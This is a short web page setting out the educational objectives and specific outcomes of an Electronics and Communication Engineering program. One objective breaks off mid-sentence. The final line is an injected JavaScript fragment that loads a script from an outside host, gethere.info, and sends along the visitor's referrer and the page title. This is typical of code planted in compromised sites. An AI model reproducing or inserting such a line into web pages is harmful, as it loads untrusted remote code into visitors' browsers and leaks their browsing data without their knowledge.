PROGRAM EDUCATIONAL OBJECTIVES (PEOs)
- PEO. 1. Recognize, synthesize and apply the acquired knowledge in basic sciences and mathematics in solving Electronics and Communication Engineering problems.
- PEO. 2. Design and implement analog and digital electronic circuits for modern communication systems with given specifications.
- PEO. 3. Inculcate the habit of team work using modern methods to achieve project objectives.
- PEO. 4. Communicate effectively, demonstrate leadership qualities and exhibit professional conduct in their
- PEO. 5. Involve in lifelong self-learning, career enhancement and adapt to changing multidisciplinary professional and social needs.
PROGRAM SPECIFIC OUTCOMES (PSOs)
- PPSO 1. Graduates will be able to apply fundamentals of electronics in various domains of analog and digital systems.
- PSO 2. Design and analyze various functional elements of different modes of communication systems and signal processing.
- PSO 3. Demonstrate and implement variety of automation system by controlling, processing different signals according to the required specifications keeping in mind it’s societal and environment effect.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;